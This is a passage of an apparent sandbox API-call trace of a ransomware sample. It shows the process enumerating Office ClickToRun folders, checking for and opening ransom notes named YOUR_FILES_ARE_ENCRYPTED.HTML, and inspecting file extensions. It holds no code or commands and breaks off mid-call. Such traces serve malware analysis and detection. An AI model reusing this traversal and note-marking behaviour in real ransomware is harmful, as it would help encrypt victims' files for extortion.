(in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc35ae0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.822] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc35ae0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="..", cAlternateFileName="")) returned 1 [0109.822] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1da7a7ac, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="ShortcutBackups", cAlternateFileName="SHORTC~1")) returned 1 [0109.822] StrStrIW (lpFirst="ShortcutBackups", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.822] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned 83 [0109.822] GetProcessHeap () returned 0x600000 [0109.822] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0109.823] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups" [0109.823] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*" [0109.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadb066f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea98, dwReserved1=0x62ea10, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.823] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1da7a7ac, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1da7a7ac, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadb066f5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea98, dwReserved1=0x62ea10, cFileName="..", cAlternateFileName="")) returned 1 [0109.823] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb066f5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadb066f5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc2f960, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62ea98, dwReserved1=0x62ea10, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.823] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadb066f5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadb066f5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc2f960, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x62ea98, dwReserved1=0x62ea10, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.823] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.823] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0109.823] GetProcessHeap () returned 0x600000 [0109.823] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0109.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\ShortcutBackups\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\shortcutbackups\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.824] GetProcessHeap () returned 0x600000 [0109.824] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0109.824] GetProcessHeap () returned 0x600000 [0109.824] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0109.824] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc35ae0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadc35ae0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc395e5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.825] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc35ae0, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadc35ae0, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc395e5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x60ef60, dwReserved1=0x63c218, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.825] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0109.825] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0109.825] GetProcessHeap () returned 0x600000 [0109.825] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Integration\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\integration\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.825] GetProcessHeap () returned 0x600000 [0109.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.826] GetProcessHeap () returned 0x600000 [0109.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0109.827] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc44550, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadc44550, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc47ffd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.827] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc44550, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadc44550, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc47ffd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.827] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0109.827] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0109.827] GetProcessHeap () returned 0x600000 [0109.827] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.827] GetProcessHeap () returned 0x600000 [0109.827] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.827] GetProcessHeap () returned 0x600000 [0109.828] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.828] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1c4bfed4, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="UserData", cAlternateFileName="")) returned 1 [0109.828] StrStrIW (lpFirst="UserData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.828] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned 52 [0109.828] GetProcessHeap () returned 0x600000 [0109.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.829] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData" [0109.829] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*" [0109.829] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc4f519, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0109.829] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1c4bfed4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadc4f519, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="..", cAlternateFileName="")) returned 1 [0109.829] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc4f519, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadc4f519, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc52ffc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.829] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadc4f519, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xadc4f519, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xadc52ffc, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0109.829] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0109.830] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0109.830] GetProcessHeap () returned 0x600000 [0109.830] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0109.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\UserData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\userdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0109.830] GetProcessHeap () returned 0x600000 [0109.830] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0109.830] GetProcessHeap () returned 0x600000 [0109.830] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0109.830] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae43d985, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xae43d985, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae4427bd, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0109.830] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xae565470, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae565470, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 1 [0109.831] StrStrIW (lpFirst="{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.831] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned 82 [0109.831] GetProcessHeap () returned 0x600000 [0109.831] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0109.831] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}" [0109.831] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*" [0109.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xae565470, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae565470, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0109.832] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xae565470, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xae565470, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="..", cAlternateFileName="")) returned 1 [0109.832] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ae9ce0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x50ae9ce0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa11790db, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x44e23, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="AirSpace.Etw.man", cAlternateFileName="AIRSPA~1.MAN")) returned 1 [0109.832] StrStrIW (lpFirst="AirSpace.Etw.man", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.832] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\AirSpace.Etw.man") returned 99 [0109.832] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0109.832] lstrlenW (lpString=".man") returned 4 [0109.832] PathFindExtensionW (pszPath="AirSpace.Etw.man") returned=".man" [0109.832] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x844141f3, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x844141f3, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadcb2920, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x9786, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822", cAlternateFileName="C2RMAN~1.2A9")) returned 1 [0109.832] StrStrIW (lpFirst="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.832] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Access.Access.x-none.msi.16.x-none.xml.2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822") returned 198 [0109.833] PathFindExtensionW (pszPath="C2RManifest.Access.Access.x-none.msi.16.x-none.xml.2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822") returned=".2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822" [0109.833] lstrlenW (lpString=".2A9C2240C096342679B02602A32DECE74F3578D36DBB1AE260CE679AA85D0822") returned 65 [0109.833] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8436b436, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x8436b436, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadce2aee, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0xe048, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.accessmui.msi.16.en-us.xml.AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63", cAlternateFileName="C2RMAN~1.AF2")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.accessmui.msi.16.en-us.xml.AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.833] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmui.msi.16.en-us.xml.AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63") returned 186 [0109.833] PathFindExtensionW (pszPath="C2RManifest.accessmui.msi.16.en-us.xml.AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63") returned=".AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63" [0109.833] lstrlenW (lpString=".AF2903751D41DD605AC38FDA596C6DF6DD35EC61729DC97D1B1D0214737CEA63") returned 65 [0109.833] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843453b4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x843453b4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xadd62b9e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0x63c268, dwReserved1=0x63c210, cFileName="C2RManifest.accessmuiset.msi.16.en-us.xml.4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F", cAlternateFileName="C2RMAN~1.4F0")) returned 1 [0109.833] StrStrIW (lpFirst="C2RManifest.accessmuiset.msi.16.en-us.xml.4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0109.833] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.accessmuiset.msi.16.en-us.xml.4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F") returned 189 [0109.833] PathFindExtensionW (pszPath="C2RManifest.accessmuiset.msi.16.en-us.xml.4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F") returned=".4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F" [0109.833] lstrlenW (lpString=".4F044CAD89A1720C2BBD364BFC640C46283E6F9D419FE0A6503497D594B8981F") returned 65 [0109.833] FindNextFileW (in: 